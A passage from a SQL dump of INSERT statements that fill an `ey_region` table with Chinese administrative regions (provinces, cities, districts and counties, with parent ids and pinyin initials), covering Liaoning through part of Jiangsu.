INSERT INTO `ey_region` VALUES ('6853', '海州区', '3', '6851', 'H');
INSERT INTO `ey_region` VALUES ('6865', '新邱区', '3', '6851', 'X');
INSERT INTO `ey_region` VALUES ('6871', '太平区', '3', '6851', 'T');
INSERT INTO `ey_region` VALUES ('6878', '清河门区', '3', '6851', 'Q');
INSERT INTO `ey_region` VALUES ('6885', '细河区', '3', '6851', 'X');
INSERT INTO `ey_region` VALUES ('6893', '阜新县', '3', '6851', 'F');
INSERT INTO `ey_region` VALUES ('6930', '彰武县', '3', '6851', 'Z');
INSERT INTO `ey_region` VALUES ('6955', '辽阳市', '2', '5827', 'L');
INSERT INTO `ey_region` VALUES ('6956', '市辖区', '3', '6955', 'S');
INSERT INTO `ey_region` VALUES ('6957', '白塔区', '3', '6955', 'B');
INSERT INTO `ey_region` VALUES ('6964', '文圣区', '3', '6955', 'W');
INSERT INTO `ey_region` VALUES ('6971', '宏伟区', '3', '6955', 'H');
INSERT INTO `ey_region` VALUES ('6977', '弓长岭区', '3', '6955', 'G');
INSERT INTO `ey_region` VALUES ('6983', '太子河区', '3', '6955', 'T');
INSERT INTO `ey_region` VALUES ('6989', '辽阳县', '3', '6955', 'L');
INSERT INTO `ey_region` VALUES ('7007', '灯塔市', '3', '6955', 'D');
INSERT INTO `ey_region` VALUES ('7024', '盘锦市', '2', '5827', 'P');
INSERT INTO `ey_region` VALUES ('7025', '市辖区', '3', '7024', 'S');
INSERT INTO `ey_region` VALUES ('7026', '双台子区', '3', '7024', 'S');
INSERT INTO `ey_region` VALUES ('7036', '兴隆台区', '3', '7024', 'X');
INSERT INTO `ey_region` VALUES ('7055', '大洼县', '3', '7024', 'D');
INSERT INTO `ey_region` VALUES ('7072', '盘山县', '3', '7024', 'P');
INSERT INTO `ey_region` VALUES ('7088', '铁岭市', '2', '5827', 'T');
INSERT INTO `ey_region` VALUES ('7089', '市辖区', '3', '7088', 'S');
INSERT INTO `ey_region` VALUES ('7090', '银州区', '3', '7088', 'Y');
INSERT INTO `ey_region` VALUES ('7099', '清河区', '3', '7088', 'Q');
INSERT INTO `ey_region` VALUES ('7105', '铁岭县', '3', '7088', 'T');
INSERT INTO `ey_region` VALUES ('7121', '西丰县', '3', '7088', 'X');
INSERT INTO `ey_region` VALUES ('7140', '昌图县', '3', '7088', 'C');
INSERT INTO `ey_region` VALUES ('7180', '调兵山市', '3', '7088', 'D');
INSERT INTO `ey_region` VALUES ('7186', '开原市', '3', '7088', 'K');
INSERT INTO `ey_region` VALUES ('7208', '朝阳市', '2', '5827', 'C');
INSERT INTO `ey_region` VALUES ('7209', '市辖区', '3', '7208', 'S');
INSERT INTO `ey_region` VALUES ('7210', '双塔区', '3', '7208', 'S');
INSERT INTO `ey_region` VALUES ('7225', '龙城区', '3', '7208', 'L');
INSERT INTO `ey_region` VALUES ('7238', '朝阳县', '3', '7208', 'C');
INSERT INTO `ey_region` VALUES ('7267', '建平县', '3', '7208', 'J');
INSERT INTO `ey_region` VALUES ('7299', '喀喇沁左翼县', '3', '7208', 'K');
INSERT INTO `ey_region` VALUES ('7322', '北票市', '3', '7208', 'B');
INSERT INTO `ey_region` VALUES ('7360', '凌源市', '3', '7208', 'L');
INSERT INTO `ey_region` VALUES ('7391', '葫芦岛市', '2', '5827', 'H');
INSERT INTO `ey_region` VALUES ('7392', '市辖区', '3', '7391', 'S');
INSERT INTO `ey_region` VALUES ('7393', '连山区', '3', '7391', 'L');
INSERT INTO `ey_region` VALUES ('7419', '龙港区', '3', '7391', 'L');
INSERT INTO `ey_region` VALUES ('7433', '南票区', '3', '7391', 'N');
INSERT INTO `ey_region` VALUES ('7446', '绥中县', '3', '7391', 'S');
INSERT INTO `ey_region` VALUES ('7474', '建昌县', '3', '7391', 'J');
INSERT INTO `ey_region` VALUES ('7503', '兴城市', '3', '7391', 'X');
INSERT INTO `ey_region` VALUES ('7531', '吉林省', '1', '0', 'J');
INSERT INTO `ey_region` VALUES ('7532', '长春市', '2', '7531', 'C');
INSERT INTO `ey_region` VALUES ('7533', '长春市辖区', '3', '7532', 'C');
INSERT INTO `ey_region` VALUES ('7534', '南关区', '3', '7532', 'N');
INSERT INTO `ey_region` VALUES ('7552', '宽城区', '3', '7532', 'K');
INSERT INTO `ey_region` VALUES ('7569', '朝阳区', '3', '7532', 'C');
INSERT INTO `ey_region` VALUES ('7582', '二道区', '3', '7532', 'E');
INSERT INTO `ey_region` VALUES ('7597', '绿园区', '3', '7532', 'L');
INSERT INTO `ey_region` VALUES ('7610', '双阳区', '3', '7532', 'S');
INSERT INTO `ey_region` VALUES ('7619', '农安县', '3', '7532', 'N');
INSERT INTO `ey_region` VALUES ('7642', '九台市', '3', '7532', 'J');
INSERT INTO `ey_region` VALUES ('7658', '榆树市', '3', '7532', 'Y');
INSERT INTO `ey_region` VALUES ('7687', '德惠市', '3', '7532', 'D');
INSERT INTO `ey_region` VALUES ('7706', '吉林市', '2', '7531', 'J');
INSERT INTO `ey_region` VALUES ('7707', '吉林市辖区', '3', '7706', 'J');
INSERT INTO `ey_region` VALUES ('7708', '昌邑区', '3', '7706', 'C');
INSERT INTO `ey_region` VALUES ('7731', '龙潭区', '3', '7706', 'L');
INSERT INTO `ey_region` VALUES ('7752', '船营区', '3', '7706', 'C');
INSERT INTO `ey_region` VALUES ('7768', '丰满区', '3', '7706', 'F');
INSERT INTO `ey_region` VALUES ('7781', '永吉县', '3', '7706', 'Y');
INSERT INTO `ey_region` VALUES ('7792', '蛟河市', '3', '7706', 'J');
INSERT INTO `ey_region` VALUES ('7810', '桦甸市', '3', '7706', 'H');
INSERT INTO `ey_region` VALUES ('7828', '舒兰市', '3', '7706', 'S');
INSERT INTO `ey_region` VALUES ('7849', '磐石市', '3', '7706', 'P');
INSERT INTO `ey_region` VALUES ('7868', '四平市', '2', '7531', 'S');
INSERT INTO `ey_region` VALUES ('7869', '四平市辖区', '3', '7868', 'S');
INSERT INTO `ey_region` VALUES ('7870', '铁西区', '3', '7868', 'T');
INSERT INTO `ey_region` VALUES ('7878', '铁东区', '3', '7868', 'T');
INSERT INTO `ey_region` VALUES ('7892', '梨树县', '3', '7868', 'L');
INSERT INTO `ey_region` VALUES ('7916', '伊通县', '3', '7868', 'Y');
INSERT INTO `ey_region` VALUES ('7933', '公主岭市', '3', '7868', 'G');
INSERT INTO `ey_region` VALUES ('7964', '双辽市', '3', '7868', 'S');
INSERT INTO `ey_region` VALUES ('7986', '辽源市', '2', '7531', 'L');
INSERT INTO `ey_region` VALUES ('7987', '辽源市辖区', '3', '7986', 'L');
INSERT INTO `ey_region` VALUES ('7988', '龙山区', '3', '7986', 'L');
INSERT INTO `ey_region` VALUES ('8000', '西安区', '3', '7986', 'X');
INSERT INTO `ey_region` VALUES ('8008', '东丰县', '3', '7986', 'D');
INSERT INTO `ey_region` VALUES ('8023', '东辽县', '3', '7986', 'D');
INSERT INTO `ey_region` VALUES ('8037', '通化市', '2', '7531', 'T');
INSERT INTO `ey_region` VALUES ('8038', '通化市辖区', '3', '8037', 'T');
INSERT INTO `ey_region` VALUES ('8039', '东昌区', '3', '8037', 'D');
INSERT INTO `ey_region` VALUES ('8051', '二道江区', '3', '8037', 'E');
INSERT INTO `ey_region` VALUES ('8058', '通化县', '3', '8037', 'T');
INSERT INTO `ey_region` VALUES ('8076', '辉南县', '3', '8037', 'H');
INSERT INTO `ey_region` VALUES ('8088', '柳河县', '3', '8037', 'L');
INSERT INTO `ey_region` VALUES ('8104', '梅河口市', '3', '8037', 'M');
INSERT INTO `ey_region` VALUES ('8129', '集安市', '3', '8037', 'J');
INSERT INTO `ey_region` VALUES ('8144', '白山市', '2', '7531', 'B');
INSERT INTO `ey_region` VALUES ('8145', '白山市辖区', '3', '8144', 'B');
INSERT INTO `ey_region` VALUES ('8146', '八道江区', '3', '8144', 'B');
INSERT INTO `ey_region` VALUES ('8159', '江源区', '3', '8144', 'J');
INSERT INTO `ey_region` VALUES ('8168', '抚松县', '3', '8144', 'F');
INSERT INTO `ey_region` VALUES ('8183', '靖宇县', '3', '8144', 'J');
INSERT INTO `ey_region` VALUES ('8192', '长白县', '3', '8144', 'C');
INSERT INTO `ey_region` VALUES ('8202', '临江市', '3', '8144', 'L');
INSERT INTO `ey_region` VALUES ('8216', '松原市', '2', '7531', 'S');
INSERT INTO `ey_region` VALUES ('8217', '松原市辖区', '3', '8216', 'S');
INSERT INTO `ey_region` VALUES ('8218', '宁江区', '3', '8216', 'N');
INSERT INTO `ey_region` VALUES ('8239', '前郭县', '3', '8216', 'Q');
INSERT INTO `ey_region` VALUES ('8266', '长岭县', '3', '8216', 'C');
INSERT INTO `ey_region` VALUES ('8300', '乾安县', '3', '8216', 'Q');
INSERT INTO `ey_region` VALUES ('8311', '扶余县', '3', '8216', 'F');
INSERT INTO `ey_region` VALUES ('8333', '白城市', '2', '7531', 'B');
INSERT INTO `ey_region` VALUES ('8334', '白城市辖区', '3', '8333', 'B');
INSERT INTO `ey_region` VALUES ('8335', '洮北区', '3', '8333', 'T');
INSERT INTO `ey_region` VALUES ('8362', '镇赉县', '3', '8333', 'Z');
INSERT INTO `ey_region` VALUES ('8375', '通榆县', '3', '8333', 'T');
INSERT INTO `ey_region` VALUES ('8393', '洮南市', '3', '8333', 'T');
INSERT INTO `ey_region` VALUES ('8420', '大安市', '3', '8333', 'D');
INSERT INTO `ey_region` VALUES ('8445', '延边州', '2', '7531', 'Y');
INSERT INTO `ey_region` VALUES ('8446', '延吉市', '3', '8445', 'Y');
INSERT INTO `ey_region` VALUES ('8456', '图们市', '3', '8445', 'T');
INSERT INTO `ey_region` VALUES ('8464', '敦化市', '3', '8445', 'D');
INSERT INTO `ey_region` VALUES ('8489', '珲春市', '3', '8445', 'H');
INSERT INTO `ey_region` VALUES ('8504', '龙井市', '3', '8445', 'L');
INSERT INTO `ey_region` VALUES ('8515', '和龙市', '3', '8445', 'H');
INSERT INTO `ey_region` VALUES ('8530', '汪清县', '3', '8445', 'W');
INSERT INTO `ey_region` VALUES ('8545', '安图县', '3', '8445', 'A');
INSERT INTO `ey_region` VALUES ('8558', '黑龙江省', '1', '0', 'H');
INSERT INTO `ey_region` VALUES ('8559', '哈尔滨市', '2', '8558', 'H');
INSERT INTO `ey_region` VALUES ('8560', '市辖区', '3', '8559', 'S');
INSERT INTO `ey_region` VALUES ('8561', '道里区', '3', '8559', 'D');
INSERT INTO `ey_region` VALUES ('8585', '南岗区', '3', '8559', 'N');
INSERT INTO `ey_region` VALUES ('8606', '道外区', '3', '8559', 'D');
INSERT INTO `ey_region` VALUES ('8633', '平房区', '3', '8559', 'P');
INSERT INTO `ey_region` VALUES ('8642', '松北区', '3', '8559', 'S');
INSERT INTO `ey_region` VALUES ('8650', '香坊区', '3', '8559', 'X');
INSERT INTO `ey_region` VALUES ('8676', '呼兰区', '3', '8559', 'H');
INSERT INTO `ey_region` VALUES ('8694', '阿城区', '3', '8559', 'A');
INSERT INTO `ey_region` VALUES ('8714', '依兰县', '3', '8559', 'Y');
INSERT INTO `ey_region` VALUES ('8729', '方正县', '3', '8559', 'F');
INSERT INTO `ey_region` VALUES ('8740', '宾县', '3', '8559', 'B');
INSERT INTO `ey_region` VALUES ('8758', '巴彦县', '3', '8559', 'B');
INSERT INTO `ey_region` VALUES ('8778', '木兰县', '3', '8559', 'M');
INSERT INTO `ey_region` VALUES ('8788', '通河县', '3', '8559', 'T');
INSERT INTO `ey_region` VALUES ('8800', '延寿县', '3', '8559', 'Y');
INSERT INTO `ey_region` VALUES ('8812', '双城市', '3', '8559', 'S');
INSERT INTO `ey_region` VALUES ('8838', '尚志市', '3', '8559', 'S');
INSERT INTO `ey_region` VALUES ('8858', '五常市', '3', '8559', 'W');
INSERT INTO `ey_region` VALUES ('8884', '齐齐哈尔市', '2', '8558', 'Q');
INSERT INTO `ey_region` VALUES ('8885', '市辖区', '3', '8884', 'S');
INSERT INTO `ey_region` VALUES ('8886', '龙沙区', '3', '8884', 'L');
INSERT INTO `ey_region` VALUES ('8894', '建华区', '3', '8884', 'J');
INSERT INTO `ey_region` VALUES ('8901', '铁锋区', '3', '8884', 'T');
INSERT INTO `ey_region` VALUES ('8911', '昂昂溪区', '3', '8884', 'A');
INSERT INTO `ey_region` VALUES ('8918', '富拉尔基区', '3', '8884', 'F');
INSERT INTO `ey_region` VALUES ('8928', '碾子山区', '3', '8884', 'N');
INSERT INTO `ey_region` VALUES ('8934', '梅里斯达斡尔族区', '3', '8884', 'M');
INSERT INTO `ey_region` VALUES ('8943', '龙江县', '3', '8884', 'L');
INSERT INTO `ey_region` VALUES ('8958', '依安县', '3', '8884', 'Y');
INSERT INTO `ey_region` VALUES ('8976', '泰来县', '3', '8884', 'T');
INSERT INTO `ey_region` VALUES ('8998', '甘南县', '3', '8884', 'G');
INSERT INTO `ey_region` VALUES ('9011', '富裕县', '3', '8884', 'F');
INSERT INTO `ey_region` VALUES ('9024', '克山县', '3', '8884', 'K');
INSERT INTO `ey_region` VALUES ('9048', '克东县', '3', '8884', 'K');
INSERT INTO `ey_region` VALUES ('9067', '拜泉县', '3', '8884', 'B');
INSERT INTO `ey_region` VALUES ('9084', '讷河市', '3', '8884', 'N');
INSERT INTO `ey_region` VALUES ('9117', '鸡西市', '2', '8558', 'J');
INSERT INTO `ey_region` VALUES ('9118', '市辖区', '3', '9117', 'S');
INSERT INTO `ey_region` VALUES ('9119', '鸡冠区', '3', '9117', 'J');
INSERT INTO `ey_region` VALUES ('9129', '恒山区', '3', '9117', 'H');
INSERT INTO `ey_region` VALUES ('9139', '滴道区', '3', '9117', 'D');
INSERT INTO `ey_region` VALUES ('9146', '梨树区', '3', '9117', 'L');
INSERT INTO `ey_region` VALUES ('9153', '城子河区', '3', '9117', 'C');
INSERT INTO `ey_region` VALUES ('9161', '麻山区', '3', '9117', 'M');
INSERT INTO `ey_region` VALUES ('9164', '鸡东县', '3', '9117', 'J');
INSERT INTO `ey_region` VALUES ('9178', '虎林市', '3', '9117', 'H');
INSERT INTO `ey_region` VALUES ('9199', '密山市', '3', '9117', 'M');
INSERT INTO `ey_region` VALUES ('9222', '鹤岗市', '2', '8558', 'H');
INSERT INTO `ey_region` VALUES ('9223', '市辖区', '3', '9222', 'S');
INSERT INTO `ey_region` VALUES ('9224', '向阳区', '3', '9222', 'X');
INSERT INTO `ey_region` VALUES ('9230', '工农区', '3', '9222', 'G');
INSERT INTO `ey_region` VALUES ('9237', '南山区', '3', '9222', 'N');
INSERT INTO `ey_region` VALUES ('9244', '兴安区', '3', '9222', 'X');
INSERT INTO `ey_region` VALUES ('9250', '东山区', '3', '9222', 'D');
INSERT INTO `ey_region` VALUES ('9261', '兴山区', '3', '9222', 'X');
INSERT INTO `ey_region` VALUES ('9266', '萝北县', '3', '9222', 'L');
INSERT INTO `ey_region` VALUES ('9283', '绥滨县', '3', '9222', 'S');
INSERT INTO `ey_region` VALUES ('9296', '双鸭山市', '2', '8558', 'S');
INSERT INTO `ey_region` VALUES ('9297', '市辖区', '3', '9296', 'S');
INSERT INTO `ey_region` VALUES ('9298', '尖山区', '3', '9296', 'J');
INSERT INTO `ey_region` VALUES ('9307', '岭东区', '3', '9296', 'L');
INSERT INTO `ey_region` VALUES ('9317', '四方台区', '3', '9296', 'S');
INSERT INTO `ey_region` VALUES ('9323', '宝山区', '3', '9296', 'B');
INSERT INTO `ey_region` VALUES ('9335', '集贤县', '3', '9296', 'J');
INSERT INTO `ey_region` VALUES ('9356', '友谊县', '3', '9296', 'Y');
INSERT INTO `ey_region` VALUES ('9370', '宝清县', '3', '9296', 'B');
INSERT INTO `ey_region` VALUES ('9393', '饶河县', '3', '9296', 'R');
INSERT INTO `ey_region` VALUES ('9419', '大庆市', '2', '8558', 'D');
INSERT INTO `ey_region` VALUES ('9420', '市辖区', '3', '9419', 'S');
INSERT INTO `ey_region` VALUES ('9421', '萨尔图区', '3', '9419', 'S');
INSERT INTO `ey_region` VALUES ('9431', '龙凤区', '3', '9419', 'L');
INSERT INTO `ey_region` VALUES ('9440', '让胡路区', '3', '9419', 'R');
INSERT INTO `ey_region` VALUES ('9451', '红岗区', '3', '9419', 'H');
INSERT INTO `ey_region` VALUES ('9458', '大同区', '3', '9419', 'D');
INSERT INTO `ey_region` VALUES ('9474', '肇州县', '3', '9419', 'Z');
INSERT INTO `ey_region` VALUES ('9489', '肇源县', '3', '9419', 'Z');
INSERT INTO `ey_region` VALUES ('9514', '林甸县', '3', '9419', 'L');
INSERT INTO `ey_region` VALUES ('9527', '杜尔伯特县', '3', '9419', 'D');
INSERT INTO `ey_region` VALUES ('9553', '伊春市', '2', '8558', 'Y');
INSERT INTO `ey_region` VALUES ('9554', '市辖区', '3', '9553', 'S');
INSERT INTO `ey_region` VALUES ('9555', '伊春区', '3', '9553', 'Y');
INSERT INTO `ey_region` VALUES ('9561', '南岔区', '3', '9553', 'N');
INSERT INTO `ey_region` VALUES ('9581', '友好区', '3', '9553', 'Y');
INSERT INTO `ey_region` VALUES ('9599', '西林区', '3', '9553', 'X');
INSERT INTO `ey_region` VALUES ('9603', '翠峦区', '3', '9553', 'C');
INSERT INTO `ey_region` VALUES ('9614', '新青区', '3', '9553', 'X');
INSERT INTO `ey_region` VALUES ('9631', '美溪区', '3', '9553', 'M');
INSERT INTO `ey_region` VALUES ('9647', '金山屯区', '3', '9553', 'J');
INSERT INTO `ey_region` VALUES ('9660', '五营区', '3', '9553', 'W');
INSERT INTO `ey_region` VALUES ('9671', '乌马河区', '3', '9553', 'W');
INSERT INTO `ey_region` VALUES ('9685', '汤旺河区', '3', '9553', 'T');
INSERT INTO `ey_region` VALUES ('9702', '带岭区', '3', '9553', 'D');
INSERT INTO `ey_region` VALUES ('9715', '乌伊岭区', '3', '9553', 'W');
INSERT INTO `ey_region` VALUES ('9729', '红星区', '3', '9553', 'H');
INSERT INTO `ey_region` VALUES ('9742', '上甘岭区', '3', '9553', 'S');
INSERT INTO `ey_region` VALUES ('9756', '嘉荫县', '3', '9553', 'J');
INSERT INTO `ey_region` VALUES ('9772', '铁力市', '3', '9553', 'T');
INSERT INTO `ey_region` VALUES ('9785', '佳木斯市', '2', '8558', 'J');
INSERT INTO `ey_region` VALUES ('9786', '市辖区', '3', '9785', 'S');
INSERT INTO `ey_region` VALUES ('9787', '向阳区', '3', '9785', 'X');
INSERT INTO `ey_region` VALUES ('9795', '前进区', '3', '9785', 'Q');
INSERT INTO `ey_region` VALUES ('9802', '东风区', '3', '9785', 'D');
INSERT INTO `ey_region` VALUES ('9810', '郊区', '3', '9785', 'J');
INSERT INTO `ey_region` VALUES ('9825', '桦南县', '3', '9785', 'H');
INSERT INTO `ey_region` VALUES ('9839', '桦川县', '3', '9785', 'H');
INSERT INTO `ey_region` VALUES ('9851', '汤原县', '3', '9785', 'T');
INSERT INTO `ey_region` VALUES ('9866', '抚远县', '3', '9785', 'F');
INSERT INTO `ey_region` VALUES ('9879', '同江市', '3', '9785', 'T');
INSERT INTO `ey_region` VALUES ('9907', '富锦市', '3', '9785', 'F');
INSERT INTO `ey_region` VALUES ('9930', '七台河市', '2', '8558', 'Q');
INSERT INTO `ey_region` VALUES ('9931', '市辖区', '3', '9930', 'S');
INSERT INTO `ey_region` VALUES ('9932', '新兴区', '3', '9930', 'X');
INSERT INTO `ey_region` VALUES ('9944', '桃山区', '3', '9930', 'T');
INSERT INTO `ey_region` VALUES ('9952', '茄子河区', '3', '9930', 'Q');
INSERT INTO `ey_region` VALUES ('9962', '勃利县', '3', '9930', 'B');
INSERT INTO `ey_region` VALUES ('9981', '牡丹江市', '2', '8558', 'M');
INSERT INTO `ey_region` VALUES ('9982', '市辖区', '3', '9981', 'S');
INSERT INTO `ey_region` VALUES ('9983', '东安区', '3', '9981', 'D');
INSERT INTO `ey_region` VALUES ('9989', '阳明区', '3', '9981', 'Y');
INSERT INTO `ey_region` VALUES ('9996', '爱民区', '3', '9981', 'A');
INSERT INTO `ey_region` VALUES ('10005', '西安区', '3', '9981', 'X');
INSERT INTO `ey_region` VALUES ('10014', '东宁县', '3', '9981', 'D');
INSERT INTO `ey_region` VALUES ('10022', '林口县', '3', '9981', 'L');
INSERT INTO `ey_region` VALUES ('10036', '绥芬河市', '3', '9981', 'S');
INSERT INTO `ey_region` VALUES ('10039', '海林市', '3', '9981', 'H');
INSERT INTO `ey_region` VALUES ('10056', '宁安市', '3', '9981', 'N');
INSERT INTO `ey_region` VALUES ('10072', '穆棱市', '3', '9981', 'M');
INSERT INTO `ey_region` VALUES ('10084', '黑河市', '2', '8558', 'H');
INSERT INTO `ey_region` VALUES ('10085', '市辖区', '3', '10084', 'S');
INSERT INTO `ey_region` VALUES ('10086', '爱辉区', '3', '10084', 'A');
INSERT INTO `ey_region` VALUES ('10122', '嫩江县', '3', '10084', 'N');
INSERT INTO `ey_region` VALUES ('10150', '逊克县', '3', '10084', 'X');
INSERT INTO `ey_region` VALUES ('10168', '孙吴县', '3', '10084', 'S');
INSERT INTO `ey_region` VALUES ('10192', '北安市', '3', '10084', 'B');
INSERT INTO `ey_region` VALUES ('10214', '五大连池市', '3', '10084', 'W');
INSERT INTO `ey_region` VALUES ('10252', '绥化市', '2', '8558', 'S');
INSERT INTO `ey_region` VALUES ('10253', '市辖区', '3', '10252', 'S');
INSERT INTO `ey_region` VALUES ('10254', '北林区', '3', '10252', 'B');
INSERT INTO `ey_region` VALUES ('10281', '望奎县', '3', '10252', 'W');
INSERT INTO `ey_region` VALUES ('10301', '兰西县', '3', '10252', 'L');
INSERT INTO `ey_region` VALUES ('10320', '青冈县', '3', '10252', 'Q');
INSERT INTO `ey_region` VALUES ('10342', '庆安县', '3', '10252', 'Q');
INSERT INTO `ey_region` VALUES ('10360', '明水县', '3', '10252', 'M');
INSERT INTO `ey_region` VALUES ('10380', '绥棱县', '3', '10252', 'S');
INSERT INTO `ey_region` VALUES ('10401', '安达市', '3', '10252', 'A');
INSERT INTO `ey_region` VALUES ('10425', '肇东市', '3', '10252', 'Z');
INSERT INTO `ey_region` VALUES ('10452', '海伦市', '3', '10252', 'H');
INSERT INTO `ey_region` VALUES ('10483', '大兴安岭地区', '2', '8558', 'D');
INSERT INTO `ey_region` VALUES ('10484', '加格达奇区', '3', '10483', 'J');
INSERT INTO `ey_region` VALUES ('10495', '松岭区', '3', '10483', 'S');
INSERT INTO `ey_region` VALUES ('10500', '新林区', '3', '10483', 'X');
INSERT INTO `ey_region` VALUES ('10509', '呼中区', '3', '10483', 'H');
INSERT INTO `ey_region` VALUES ('10515', '呼玛县', '3', '10483', 'H');
INSERT INTO `ey_region` VALUES ('10525', '塔河县', '3', '10483', 'T');
INSERT INTO `ey_region` VALUES ('10534', '漠河县', '3', '10483', 'M');
INSERT INTO `ey_region` VALUES ('10543', '上海市', '1', '0', 'S');
INSERT INTO `ey_region` VALUES ('10544', '上海市', '2', '10543', 'S');
INSERT INTO `ey_region` VALUES ('10545', '黄浦区', '3', '10544', 'H');
INSERT INTO `ey_region` VALUES ('10555', '卢湾区', '3', '10544', 'L');
INSERT INTO `ey_region` VALUES ('10560', '徐汇区', '3', '10544', 'X');
INSERT INTO `ey_region` VALUES ('10575', '长宁区', '3', '10544', 'C');
INSERT INTO `ey_region` VALUES ('10586', '静安区', '3', '10544', 'J');
INSERT INTO `ey_region` VALUES ('10592', '普陀区', '3', '10544', 'P');
INSERT INTO `ey_region` VALUES ('10602', '闸北区', '3', '10544', 'Z');
INSERT INTO `ey_region` VALUES ('10612', '虹口区', '3', '10544', 'H');
INSERT INTO `ey_region` VALUES ('10623', '杨浦区', '3', '10544', 'Y');
INSERT INTO `ey_region` VALUES ('10636', '闵行区', '3', '10544', 'M');
INSERT INTO `ey_region` VALUES ('10650', '宝山区', '3', '10544', 'B');
INSERT INTO `ey_region` VALUES ('10664', '嘉定区', '3', '10544', 'J');
INSERT INTO `ey_region` VALUES ('10678', '浦东新区', '3', '10544', 'P');
INSERT INTO `ey_region` VALUES ('10704', '金山区', '3', '10544', 'J');
INSERT INTO `ey_region` VALUES ('10715', '松江区', '3', '10544', 'S');
INSERT INTO `ey_region` VALUES ('10735', '青浦区', '3', '10544', 'Q');
INSERT INTO `ey_region` VALUES ('10747', '南汇区', '3', '10544', 'N');
INSERT INTO `ey_region` VALUES ('10765', '奉贤区', '3', '10544', 'F');
INSERT INTO `ey_region` VALUES ('10780', '崇明区', '3', '10544', 'C');
INSERT INTO `ey_region` VALUES ('10808', '江苏省', '1', '0', 'J');
INSERT INTO `ey_region` VALUES ('10809', '南京市', '2', '10808', 'N');
INSERT INTO `ey_region` VALUES ('10810', '市辖区', '3', '10809', 'S');
INSERT INTO `ey_region` VALUES ('10811', '玄武区', '3', '10809', 'X');
INSERT INTO `ey_region` VALUES ('10820', '白下区', '3', '10809', 'B');
INSERT INTO `ey_region` VALUES ('10831', '秦淮区', '3', '10809', 'Q');
INSERT INTO `ey_region` VALUES ('10837', '建邺区', '3', '10809', 'J');
INSERT INTO `ey_region` VALUES ('10845', '鼓楼区', '3', '10809', 'G');
INSERT INTO `ey_region` VALUES ('10853', '下关区', '3', '10809', 'X');
INSERT INTO `ey_region` VALUES ('10860', '浦口区', '3', '10809', 'P');
INSERT INTO `ey_region` VALUES ('10876', '栖霞区', '3', '10809', 'Q');
INSERT INTO `ey_region` VALUES ('10894', '雨花台区', '3', '10809', 'Y');
INSERT INTO `ey_region` VALUES ('10903', '江宁区', '3', '10809', 'J');
INSERT INTO `ey_region` VALUES ('10916', '六合区', '3', '10809', 'L');
INSERT INTO `ey_region` VALUES ('10937', '溧水县', '3', '10809', 'L');
INSERT INTO `ey_region` VALUES ('10947', '高淳县', '3', '10809', 'G');
INSERT INTO `ey_region` VALUES ('10960', '无锡市', '2', '10808', 'W');
INSERT INTO `ey_region` VALUES ('10961', '市辖区', '3', '10960', 'S');
INSERT INTO `ey_region` VALUES ('10962', '崇安区', '3', '10960', 'C');
INSERT INTO `ey_region` VALUES ('10969', '南长区', '3', '10960', 'N');
INSERT INTO `ey_region` VALUES ('10976', '北塘区', '3', '10960', 'B');
INSERT INTO `ey_region` VALUES ('10981', '锡山区', '3', '10960', 'X');
INSERT INTO `ey_region` VALUES ('10990', '惠山区', '3', '10960', 'H');
INSERT INTO `ey_region` VALUES ('10999', '滨湖区', '3', '10960', 'B');
INSERT INTO `ey_region` VALUES ('11018', '江阴市', '3', '10960', 'J');
INSERT INTO `ey_region` VALUES ('11039', '宜兴市', '3', '10960', 'Y');
INSERT INTO `ey_region` VALUES ('11067', '徐州市', '2', '10808', 'X');
INSERT INTO `ey_region` VALUES ('11068', '市辖区', '3', '11067', 'S');
INSERT INTO `ey_region` VALUES ('11069', '鼓楼区', '3', '11067', 'G');
INSERT INTO `ey_region` VALUES ('11081', '云龙区', '3', '11067', 'Y');
INSERT INTO `ey_region` VALUES ('11089', '九里区', '3', '11067', 'J');
INSERT INTO `ey_region` VALUES ('11103', '贾汪区', '3', '11067', 'J');
INSERT INTO `ey_region` VALUES ('11115', '泉山区', '3', '11067', 'Q');
INSERT INTO `ey_region` VALUES ('11126', '丰县', '3', '11067', 'F');
INSERT INTO `ey_region` VALUES ('11142', '沛县', '3', '11067', 'P');
INSERT INTO `ey_region` VALUES ('11160', '铜山县', '3', '11067', 'T');
INSERT INTO `ey_region` VALUES ('11182', '睢宁县', '3', '11067', 'S');
INSERT INTO `ey_region` VALUES ('11200', '新沂市', '3', '11067', 'X');
INSERT INTO `ey_region` VALUES ('11218', '邳州市', '3', '11067', 'P');
INSERT INTO `ey_region` VALUES ('11245', '常州市', '2', '10808', 'C');
INSERT INTO `ey_region` VALUES ('11246', '常州市区', '3', '11245', 'C');
INSERT INTO `ey_region` VALUES ('11247', '天宁区', '3', '11245', 'T');
INSERT INTO `ey_region` VALUES ('11254', '钟楼区', '3', '11245', 'Z');
INSERT INTO `ey_region` VALUES ('11262', '戚墅堰区', '3', '11245', 'Q');
INSERT INTO `ey_region` VALUES ('11266', '新北区', '3', '11245', 'X');
INSERT INTO `ey_region` VALUES ('11276', '武进区', '3', '11245', 'W');
INSERT INTO `ey_region` VALUES ('11311', '溧阳市', '3', '11245', 'L');
INSERT INTO `ey_region` VALUES ('11331', '金坛市', '3', '11245', 'J');
INSERT INTO `ey_region` VALUES ('11348', '苏州市', '2', '10808', 'S');
INSERT INTO `ey_region` VALUES ('11349', '市辖区', '3', '11348', 'S');
INSERT INTO `ey_region` VALUES ('11350', '沧浪区', '3', '11348', 'C');
INSERT INTO `ey_region` VALUES ('11357', '平江区', '3', '11348', 'P');
INSERT INTO `ey_region` VALUES ('11368', '金阊区', '3', '11348', 'J');
INSERT INTO `ey_region` VALUES ('11374', '苏州高新区虎丘区', '3', '11348', 'S');
INSERT INTO `ey_region` VALUES ('11387', '吴中区', '3', '11348', 'W');
INSERT INTO `ey_region` VALUES ('11409', '相城区', '3', '11348', 'X');
INSERT INTO `ey_region` VALUES ('11419', '常熟市', '3', '11348', 'C');
INSERT INTO `ey_region` VALUES ('11433', '张家港市', '3', '11348', 'Z');
INSERT INTO `ey_region` VALUES ('11448', '昆山市', '3', '11348', 'K');
INSERT INTO `ey_region` VALUES ('11460', '吴江市', '3', '11348', 'W');
INSERT INTO `ey_region` VALUES ('11472', '太仓市', '3', '11348', 'T');
INSERT INTO `ey_region` VALUES ('11482', '南通市', '2', '10808', 'N');
INSERT INTO `ey_region` VALUES ('11483', '市辖区', '3', '11482', 'S');
INSERT INTO `ey_region` VALUES ('11484', '崇川区', '3', '11482', 'C');
INSERT INTO `ey_region` VALUES ('11502', '港闸区', '3', '11482', 'G');
INSERT INTO `ey_region` VALUES ('11510', '海安县', '3', '11482', 'H');
INSERT INTO `ey_region` VALUES ('11526', '如东', '3', '11482', 'R');
